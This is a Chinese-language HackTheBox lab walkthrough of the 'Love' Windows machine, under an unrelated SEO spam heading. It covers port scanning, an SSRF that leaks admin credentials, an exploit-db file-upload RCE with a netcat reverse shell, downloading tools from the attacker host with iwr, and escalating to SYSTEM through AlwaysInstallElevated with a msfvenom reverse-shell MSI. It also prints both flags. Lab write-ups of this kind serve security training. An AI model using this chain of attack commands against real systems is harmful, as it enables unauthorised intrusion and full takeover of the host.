北京服务设计西安seo排名外包
目录
连接至HTB服务器并启动靶机
信息收集
使用rustscan对靶机TCP端口进行开放扫描
使用nmap对靶机开放端口进行脚本、服务扫描
使用浏览器访问靶机443端口
尝试利用该功能访问靶机自身80端口
使用ffuf对靶机80端口进行路径FUZZ
漏洞利用
使用searchsploit搜索靶机80端口WebAPP漏洞
将需要利用的各个URL进行修改,靶机并不存在votesystem路径
USER_FLAG:8d5c2780dfa8f56cc7fd8ed6b62ac9f1
特权提升
将攻击机中的winpeas64.exe进行下载
使用msfvenom生成一个msi木马
ROOT_FLAG:16d697353a194abcbbe52226a00e8ad9
连接至HTB服务器并启动靶机
靶机IP:10.10.10.239
分配IP:10.10.16.9
信息收集
使用rustscan对靶机TCP端口进行开放扫描
rustscan -a 10.10.10.239 -r 1-65535 --ulimit 5000 | tee res.txt
提取出端口号
ports=$(grep syn-ack res.txt | awk -F '/' '{print $1}' | paste -s -d ',')┌──(root㉿kali)-[/home/kali/Desktop/temp]
└─# ports=$(grep syn-ack res.txt | awk -F '/' '{print $1}' | paste -s -d ',')
┌──(root㉿kali)-[/home/kali/Desktop/temp]
└─# echo $ports
80,135,139,443,445,3306,5000,5040,5985,5986,7680,47001,49664,49665,49666,49667,49668,49669,49670
使用nmap对靶机开放端口进行脚本、服务扫描
nmap -p$ports -sCV 10.10.10.239
使用nmap对靶机UDP常用端口进行开放扫描
nmap -sU --top-ports 20 -Pn 10.10.10.239┌──(root㉿kali)-[/home/kali/Desktop/temp]
└─# nmap -sU --top-ports 20 -Pn 10.10.10.239
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-11-28 02:19 EST
Nmap scan report for 10.10.10.239
Host is up (0.071s latency).PORT STATE SERVICE
53/udp open|filtered domain
67/udp open|filtered dhcps
68/udp closed dhcpc
69/udp closed tftp
123/udp closed ntp
135/udp closed msrpc
137/udp open|filtered netbios-ns
138/udp open|filtered netbios-dgm
139/udp closed netbios-ssn
161/udp closed snmp
162/udp open|filtered snmptrap
445/udp closed microsoft-ds
500/udp open|filtered isakmp
514/udp open|filtered syslog
520/udp open|filtered route
631/udp open|filtered ipp
1434/udp closed ms-sql-m
1900/udp open|filtered upnp
4500/udp open|filtered nat-t-ike
49152/udp open|filtered unknownNmap done: 1 IP address (1 host up) scanned in 19.32 seconds
使用浏览器访问靶机443端口
点击左下角的"查看证书"按钮查看该IP绑定域名
将该域名与靶机IP写入hosts文件中
sed -i '1i 10.10.10.239 staging.love.htb' /etc/hosts┌──(root㉿kali)-[/home/kali/Desktop/temp]
└─# sed -i '1i 10.10.10.239 staging.love.htb' /etc/hosts
┌──(root㉿kali)-[/home/kali/Desktop/temp]
└─# head -n 1 /etc/hosts
10.10.10.239 staging.love.htb
访问该域名后点击左上角的Demo
这里是一个允许直接与URL交互的表单
攻击机本地开启一个http服务
php -S 0:8888尝试利用该页访问攻击机8888端口
本地成功收到了回显,证明该接口是可以出网的
┌──(root㉿kali)-[/home/kali/Desktop/temp]
└─# php -S 0:8888
[Thu Nov 28 08:21:53 2024] PHP 8.2.24 Development Server (http://0:8888) started
[Thu Nov 28 08:22:41 2024] 10.10.10.239:50458 Accepted
[Thu Nov 28 08:22:41 2024] 10.10.10.239:50458 [404]: GET / - No such file or directory
[Thu Nov 28 08:22:41 2024] 10.10.10.239:50458 Closing
尝试利用该功能访问靶机自身80端口
由显示可见,与我们直接访问靶机80端口页面是一致的
利用该功能访问靶机自身5000端口
账户:admin
密码:@LoveIsInTheAir!!!!
使用ffuf对靶机80端口进行路径FUZZ
ffuf -u http://10.10.10.239/FUZZ -w ../dictionary/Common-dir.txt
直接访问/admin路径
填入上面拿到的凭证直接进入后台面板
漏洞利用
使用searchsploit搜索靶机80端口WebAPP漏洞
searchsploit voting system
从中将认证后文件上传导致的RCE脚本取出
searchsploit -m 49445.py 对该脚本中的URL、USERNAME、PASSWORD、LHOST、LPORT进行配置
首先将靶机IP与其根域名进行绑定
sed -i '1i 10.10.10.239 love.htb' /etc/hosts┌──(root㉿kali)-[/home/kali/Desktop/temp]
└─# sed -i '1i 10.10.10.239 love.htb' /etc/hosts
┌──(root㉿kali)-[/home/kali/Desktop/temp]
└─# head -n 1 /etc/hosts
10.10.10.239 love.htb
将需要利用的各个URL进行修改,靶机并不存在votesystem路径
本地侧nc开始监听
rlwrap -cAr nc -lvnp 1425运行该EXP
python 49445.py本地侧nc收到回显
┌──(root㉿kali)-[/home/kali/Desktop/temp]
└─# rlwrap -cAr nc -lvnp 1425
listening on [any] 1425 ...
connect to [10.10.16.9] from (UNKNOWN) [10.10.10.239] 50501
b374k shell : connectedMicrosoft Windows [Version 10.0.19042.867]
(c) 2020 Microsoft Corporation. All rights reserved.C:\xampp\htdocs\omrs\images>whoami
whoami
love\phoebe
查找user_flag位置并查看其内容
C:\xampp\htdocs\omrs\images>cd c:\
cd c:\c:\>dir /s user.txt
dir /s user.txt
Volume in drive C has no label.
Volume Serial Number is 56DE-BA30Directory of c:\Users\Phoebe\Desktop
11/28/2024 03:37 AM 34 user.txt
1 File(s) 34 bytesTotal Files Listed:
1 File(s) 34 bytes
0 Dir(s) 4,102,651,904 bytes freec:\>type "c:\Users\Phoebe\Desktop\user.txt"
type "c:\Users\Phoebe\Desktop\user.txt"
8d5c2780dfa8f56cc7fd8ed6b62ac9f1
USER_FLAG:8d5c2780dfa8f56cc7fd8ed6b62ac9f1
特权提升
查看靶机系统中存在的用户
net userC:\xampp\htdocs\omrs\images>net user
net userUser accounts for \\LOVE
-------------------------------------------------------------------------------
Administrator DefaultAccount Guest
Phoebe WDAGUtilityAccount
The command completed successfully.
查看靶机系统信息
systeminfo
本地侧开启一个http服务
php -S 0:6666靶机中的cmd切换到powershell
powershell将攻击机中的winpeas64.exe进行下载
iwr http://10.10.16.9:6666/winpeas64.exe -O winpeas64.exePS C:\Users\Phoebe\Desktop> iwr http://10.10.16.9:6666/winpeas64.exe -O winpeas64.exe
iwr http://10.10.16.9:6666/winpeas64.exe -O winpeas64.exe
PS C:\Users\Phoebe\Desktop> ls
ls
Directory: C:\Users\Phoebe\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-ar--- 11/28/2024 3:37 AM 34 user.txt
-a---- 11/28/2024 6:16 PM 2424320 winpeas64.exe
直接运行该工具
.\winpeas64.exe
此处可见注册表项AlwaysInstallElevated已启用它允许任何用户以系统身份安装.msi文件
使用msfvenom生成一个msi木马
msfvenom -a x64 -p windows/x64/shell_reverse_tcp LHOST=10.10.16.9 LPORT=4444 -f msi > shell.msi靶机将该木马进行下载
iwr http://10.10.16.9:6666/shell.msi -O shell.msi本地侧nc开始监听
rlwrap -cAr nc -lvnp 4444静默安装该木马文件
msiexec /qn /i shell.msi本地侧nc收到回显
┌──(root㉿kali)-[/home/kali/Desktop/temp]
└─# rlwrap -cAr nc -lvnp 4444
listening on [any] 4444 ...
connect to [10.10.16.9] from (UNKNOWN) [10.10.10.239] 50504
Microsoft Windows [Version 10.0.19042.867]
(c) 2020 Microsoft Corporation. All rights reserved.C:\WINDOWS\system32>whoami
whoami
nt authority\system
查找root_flag位置并查看其内容
C:\WINDOWS\system32>cd c:\
cd c:\c:\>dir /s root.txt
dir /s root.txt
Volume in drive C has no label.
Volume Serial Number is 56DE-BA30Directory of c:\Users\Administrator\Desktop
11/28/2024 03:37 AM 34 root.txt
1 File(s) 34 bytesTotal Files Listed:
1 File(s) 34 bytes
0 Dir(s) 4,095,647,744 bytes freec:\>type "c:\Users\Administrator\Desktop\root.txt"
type "c:\Users\Administrator\Desktop\root.txt"
16d697353a194abcbbe52226a00e8ad9